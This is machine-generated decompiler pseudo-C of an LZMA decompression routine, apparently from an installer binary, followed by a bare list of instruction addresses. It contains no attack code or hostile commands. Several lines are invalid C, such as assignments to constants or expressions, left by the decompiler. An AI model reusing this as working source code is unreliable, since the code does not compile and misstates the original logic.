							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = _t414;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406398
0x00406398
0x0040639c
0x00406453
0x00406456
0x00406462
0x00406343
0x00406343
0x00406346
0x004066b8
0x004066b8
0x004066bb
0x004066bb
0x004066c1
0x004066c7
0x004066cd
0x004066e7
0x004066ea
0x004066f0
0x004066fb
0x004066fd
0x004066cf
0x004066cf
0x004066de
0x004066e2
0x004066e2
0x00406707
0x0040672e
0x0040672e
0x00406734
0x00406734
0x00000000
0x00406709
0x00406709
0x0040670d
0x004068bc
0x00000000
0x004068bc
0x00406719
0x00406720
0x00406728
0x0040672b
0x00000000
0x0040672b
0x004063a2
0x004063a6
0x004068e7
0x004068e7
0x004068ea
0x004068ee
0x004068ee
0x004063ac
0x004063b2
0x004063b5
0x004063b9
0x004063bc
0x004063c0
0x00406886
0x004068d2
0x004068da
0x004068e1
0x004068e3
0x00000000
0x004068e3
0x004063c6
0x004063c9
0x004063cf
0x004063d1
0x004063d1
0x004063d4
0x004063d7
0x004063da
0x004063dd
0x004063e0
0x004063e3
0x004063e4
0x004063e6
0x004063e6
0x004063e6
0x004063e9
0x004063ec
0x004063ef
0x004063f2
0x004063f2
0x004063f5
0x004063f7
0x004063f7
0x004063fa
0x004063fa
0x004063fa
0x00405ed0
0x00405ed0
0x00405ed9
0x00000000
0x00000000
0x00405edf
0x00000000
0x00405eea
0x00000000
0x00000000
0x00405ef3
0x00405ef6
0x00405ef9
0x00405efd
0x00000000
0x00000000
0x00405f03
0x00405f06
0x00405f08
0x00405f09
0x00405f0c
0x00405f0e
0x00405f0f
0x00405f11
0x00405f14
0x00405f19
0x00405f1e
0x00405f27
0x00405f3a
0x00405f3d
0x00405f49
0x00405f71
0x00405f73
0x00405f81
0x00405f81
0x00405f85
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f75
0x00405f75
0x00405f78
0x00405f79
0x00405f79
0x00000000
0x00405f75
0x00405f4f
0x00405f54
0x00405f54
0x00405f5d
0x00405f65
0x00405f68
0x00000000
0x00405f6e
0x00405f6e
0x00000000
0x00405f6e
0x00000000
0x00405f8b
0x00405f8b
0x00405f8f
0x0040683b
0x00000000
0x0040683b
0x00405f98
0x00405fa8
0x00405fab
0x00405fae
0x00405fae
0x00405fae
0x00405fb1
0x00405fb5
0x00000000
0x00000000
0x00405fb7
0x00405fbd
0x00405fe7
0x00405fed
0x00405ff4
0x00000000
0x00405ff4
0x00405fc3
0x00405fc6
0x00405fcb
0x00405fcb
0x00405fd6
0x00405fde
0x00405fe1
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406026
0x0040602c
0x0040602f
0x0040603c
0x00406044
0x00000000
0x00000000
0x00405ffb
0x00405ffb
0x00405fff
0x0040684a
0x00000000
0x0040684a
0x0040600b
0x00406016
0x00406016
0x00406016
0x00406019
0x0040601c
0x0040601f
0x00406024
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
